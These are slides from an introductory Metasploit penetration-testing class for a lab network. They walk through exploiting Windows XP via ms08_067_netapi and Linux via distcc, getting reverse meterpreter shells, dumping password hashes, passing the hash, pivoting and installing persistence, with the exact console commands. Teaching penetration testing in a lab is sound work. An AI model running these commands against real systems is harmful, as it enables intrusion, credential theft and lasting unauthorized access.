Upload
georgia-weidman
View
22.877
Download
4
Tags:
Embed Size (px)
DESCRIPTION
Slides for the beginning Metasploit class.
Citation preview
Penetration Testing with Metasploit
Georgia Weidman
Acknowledgements
• Metasploit Team
• Offensive Security/Metasploit Unleashed
• Hackers for Charity
• David Kennedy
• BSides Delaware Crew
• Darren
Agenda
• Metasploit Basics
– Some terminology/brief intro to pentesting
– How Metasploit works
– Interacting with Metasploit
• Basic Exploitation
– Exploiting a vulnerability using Metasploit console
• Using Meterpreter
– Using the Meterpreter shell for post exploitation
Agenda
• Metasploit in a penetration test
– Information Gathering
– Vulnerability Scanning
– Exploitation in depth
– Post exploitation
– Reporting
• Hack some stuff
– Pop my boxes
Connecting
Wireless access point SSID IgnatiusRiley
Password: metasploit
What’s in the lab?
• Windows XP SP2
– IP address: 192.168.20.22
• Ubuntu Linux 8.04 (Metasploitable)
– IP address: 192.168.20.23
Others below .100 (.100 and above are you guys)
What is Penetration Testing?
Simulation of a real attack
Get out of jail free card for exploiting systems
Report to customers with findings and recommendations
Find and remediate vulnerabilities before attackers exploit them
What is Metasploit?
Exploitation framework
Ruby based
Modular
Exploits, payloads, auxiliaries, and more
Metasploit Terminology
Exploit: vector for penetrating the system
Payload: shellcode, what you want the exploit to do
Encoders: encode or mangle payload
Auxiliary: other modules besides exploitation
Session: connection from a successful exploit
Metasploit Interfaces
Msfconsole
Msfcli
Msfweb, Msfgui (discontinued)
Metasploit Pro, Metasploit Express
Armitage
Exploitation Streamlining
• Traditional Pentest: – Find public exploit
– Change offsets and return address for your target
– Replace shellcode
• Metasploit: – Load Metasploit module
– Select target OS
– Set IP addresses
– Select payload
Using Msfconsole: Exploitation
use <module> - sets exploit/auxillary/etc. to use
set <x X> - set a parameter
setg <x X> - set a parameter globally
show <x> - lists all available x
exploit – runs the selected module
Windows Exploitation Example
search windows/smb info windows/smb/ms08_067_netapi use windows/smb/ms08_067_netapi show payloads set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.20.22 (set other options as well) exploit
MSFcli Exploitation Example
./msfcli <exploit> <option=x> E
Example: msfcli windows/smb/ms08_067_netapi
RHOST=192.168.1.2 LHOST=192.168.1.3
PAYLOAD=windows/shell/bind_tcp E
E = exploit
O = show options
P = show payloads
Linux Exploitation Example
search distcc
use unix/misc/distcc_exec
show payloads
set payload cmd/unix/reverse
show options
set rhost 192.168.20.23
set lhost 192.168.20.102 (your ip)
exploit
Sessions
sessions -l lists all active sessions
Sessions –i <id> interact with a given session
Meterpreter
Gain a session using a meterpreter payload
Memory based/never hits the disk
Everything a shell can do plus extra
Meterpreter Commands
help – shows all available commands
background – backgrounds the session
ps – shows all processes
migrate <process id>– moves meterpreter to
another process
getuid – shows the user
Meterpreter Commands
download <file> - pulls a file from the victim
upload <file on attacker> <file on victim> - pushes a file to the victim
hashdump – dumps the hashes from the sam
shell – drops you in a shell
Exercise
In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine.
Experiment with different payloads and meterpreter commands.
Information Gathering
Learning as much about a target as possible
Examples: open ports, running services, installed software
Identify points for further exploration
Metasploit and Databases
Metasploit supports MySQL and PostgreSQL
/etc/init.d/postgresql-8.4 start (starts PostgeSQL)
msf > db_connect
postgres:[email protected]/metasploit (connects to database server and creates database metasploit)
Portscanning
Queries a host to see if a program is listening
Ex: Browsing to a website – webserver listens on port 80
Listening ports are accessible by an attacker and if vulnerable may be used for exploitation
Ex: ms08_067_netapi exploits smb on port 445
Metasploit and nmap
Port scanning and just about everything else
http://nmap.org/ man nmap
Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1)
msf > db_import subnet1.xml
MSF Axillary Portscanners
msf > search portscan (shows portscan modules)
scanner/portscan/tcp (runs a TCP syn scan)
Use auxiliary modules like exploits (use, set,
exploit, etc.)
Some Other MSF Scanners
scanner/smb/smb_version (scans port 445 for the smb version, good way to get OS version)
scanner/ssh/ssh_version (queries the ssh version)
scanner/ftp/anonymous (anonymous ftp login)
Vulnerability Scanning
Query systems for potential vulnerabilities
Identify potential methods of penetration
Ex: SMB version scan in information gathering
returned port 445 open and target Windows XP SP2, scan for ms08_067_netapi vulnerability
Metasploit and Nessus
Tenable's Vulnerability Scanner (http://www.nessus.org)
msf>load nessus
msf > nessus_connect student1:[email protected] ok (ok says no ssl is ok)
msf > nessus_policy_list
msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage)
msf> nessus_report_list
msf> nessus_report_get <report id>
Metasploit Vulnerability Scanners
SMB Login
Given a set of credentials what systems can they access?
scanner/smb/smb_login
Open VNC and X11
If misconfigured may be accessible without credentials
scanner/vnc/vnc_none_auth
scanner/x11/open_x11
Using Msfconsole: Exploitation
use <module> - sets exploit/auxillary/etc. to use
set <x X> - set a parameter
setg <x X> - set a parameter globally
show <x> - lists all available x
exploit – runs the selected module
Our Database
hosts
services
vulns
-c select columns
-s search for specific string
db_autopwn
By default just runs all the exploits that match a given open port
Not stealthy
Using vulnerability data can be made smarter, matches vulnerabilities instead of ports
db_autopwn -x -e
Attacking MSSQL
MSSQL TCP port can change, UDP port is 1434
msf> search mssql (shows all mssql modules)
msf> use scanner/mssql/mssql_ping (queries UDP 1434 for information including TCP port)
msf> use scanner/mssql/mssql_login (tries passwords to log into mssql)
msf> use windows/mssql/mssql_payload (logs into mssql and gets a shell
We have a shell, now what?
Privilege escalation
Local information gathering
Exploiting additional hosts
Maintaining access
Forensic avoidance
Meterpreter: Privilege Escalation
A session has the privileges of the exploited process
getuid (tells you what user your session is running as)
getsystem (tries various techniques to escalate privileges)
Meterpreter: Enabling Remote Desktop
Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group
run getgui –e
Meterpreter: Migrating
If the process that hosts meterpreter closes meterpreter dies too
Example: client side exploit residing in the browser
meterpreter> ps (shows all processes)
meterpreter> migrate <process id> (moves to a new process)
Meterpreter: Searching for Content
Look for specific interesting files on the exploited system
search -h
Example: search -f *.jpg (finds all the porn)
Pivoting
Scenario: Exploit a dual networked host, with a
routeable interface and non routable one. Can we
attack other hosts on the non routeable interface
without SSH tunneling?
Route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1)
Now you can portscan, exploit, etc. the non routable subnet
PSExec
hashdump (dumps the hashes, not always easy to crack)
Why not just pass the hash to other systems?
use windows/smb/psexec
set SMBPass to the hash
Meterpreter: Persistence
Persistence script installs a meterpreter service
Meterpreter comes back when the box restarts
Ex: run persistence -U -i 5 -p 443 –r 192.168.20.101 (respawns on login, at a 5 second interval on port 443 to ip 192.168.20.101)
Exercises
Perform a penetration test on the Windows and Linux systems we used in class
Perform a penetration test on the lab network
Contact
Georgia Weidman
Website: http://www.grmn00bs.com
http://www.georgiaweidman.com
Email: [email protected]
Twitter: @vincentkadmon